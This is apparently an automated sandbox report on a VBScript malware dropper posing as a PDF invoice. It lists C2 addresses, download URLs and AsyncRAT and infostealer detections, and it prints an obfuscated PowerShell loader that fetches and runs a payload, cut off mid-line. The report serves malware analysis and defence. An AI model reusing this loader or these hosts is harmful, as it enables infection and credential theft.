Windows Analysis Report
Factura.PDF______________________________________.vbs

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 91.92.242.85

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Source: global traffic

TCP traffic: 192.168.2.7:49711 -> 91.92.242.85:3344

Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /ghj.txt HTTP/1.1Host: bomdokasw.ru.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.45.138 104.21.45.138
Source: Joe Sandbox View	IP Address: 91.92.242.85 91.92.242.85
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: THEZONEBG THEZONEBG

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /d/thAhY HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.98.116.138:443 -> 192.168.2.7:49707 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85
Source: unknown	TCP traffic detected without corresponding DNS query: 91.92.242.85

Source: global traffic	HTTP traffic detected: GET /d/thAhY HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /ghj.txt HTTP/1.1Host: bomdokasw.ru.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: uploaddeimagens.com.br
Source: global traffic	DNS traffic detected: DNS query: bomdokasw.ru.com

Source: wscript.exe, 00000000.00000003.1421104712.0000022662DEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1419126722.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1422613838.0000022662E16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421357637.0000022662DF8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197941339.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198115471.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198078112.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197756704.00000226647D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1419126722.00000226647DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420035528.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421048524.0000022662DCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197984079.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197804781.0000022662DEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1418175988.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198036947.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421011003.00000226647C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1422666211.0000022662E81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420751978.0000022662E81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1422054641.00000226647C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423056331.00000226647C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197842875.00000226647EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspx
Source: wscript.exe, 00000000.00000003.1197893332.00000226647C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198150141.00000226647CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198174575.00000226647CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197929809.00000226647CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspx0
Source: wscript.exe, 00000000.00000002.1422666211.0000022662E81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420751978.0000022662E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxT
Source: wscript.exe, 00000000.00000003.1419126722.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197941339.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198115471.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198078112.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420035528.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197984079.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1418175988.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1198036947.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197842875.00000226647EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421320095.00000226647F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxd
Source: MSBuild.exe, 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 0000000E.00000002.1963089159.000001322BD0F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2501923304.0000000003091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 0000000E.00000002.1963089159.000001322BCBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 0000000E.00000002.1963089159.000001322BCDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: MSBuild.exe, 00000012.00000002.2501923304.0000000003091000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: powershell.exe, 0000000E.00000002.1999796603.0000013243D28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: wscript.exe, 00000000.00000003.1418969755.0000022664EE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420543932.0000022664EDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000003.1420751978.0000022662E46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000000.00000003.1420883430.0000022664EAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421166233.0000022664EAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1419126722.00000226647DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1418969755.0000022664EE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421011003.00000226647C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1422054641.00000226647C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1419188810.00000226647EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423363714.0000022664EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1420543932.0000022664EDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423056331.00000226647C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423028881.00000226647C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/thAhY
Source: wscript.exe, 00000000.00000003.1420883430.0000022664EAA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421166233.0000022664EAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423363714.0000022664EB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/thAhYf/
Source: wscript.exe, 00000000.00000003.1420751978.0000022662E30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1422666211.0000022662E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/thAhYolume4Z
Source: wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/thAhYs
Source: wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: places.raw.18.dr	String found in binary or memory: https://support.mozilla.org
Source: places.raw.18.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: places.raw.18.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000010.00000002.1954641408.000002253E5B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
Source: MSBuild.exe, 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: MSBuild.exe, 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_seeaCould
Source: tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: tmpBC62.tmp.dat.18.dr, tmpBCA4.tmp.dat.18.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000000.00000003.1420543932.0000022664EBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1423394983.0000022664EC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1421492546.0000022664E05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: places.raw.18.dr	String found in binary or memory: https://www.mozilla.org
Source: places.raw.18.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: places.raw.18.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: MSBuild.exe, 00000012.00000002.2530205557.00000000042AB000.00000004.00000800.00020000.00000000.sdmp, tmp31E6.tmp.dat.18.dr, places.raw.18.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: places.raw.18.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000012.00000002.2530205557.00000000042AB000.00000004.00000800.00020000.00000000.sdmp, tmp31E6.tmp.dat.18.dr, places.raw.18.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: MSBuild.exe, 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: MSBuild.exe, 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 66.90.95.11:443 -> 192.168.2.7:49710 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 18_2_07411BDC CreateDesktopA,

18_2_07411BDC

System Summary

Malicious sample detected (through community Yara rule)

Source: 18.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 18.2.MSBuild.exe.6c30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 18.2.MSBuild.exe.6c30000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 18.2.MSBuild.exe.71f0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 18.2.MSBuild.exe.71f0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000012.00000002.2491457126.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000012.00000002.2549068549.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8806
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 8806			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODg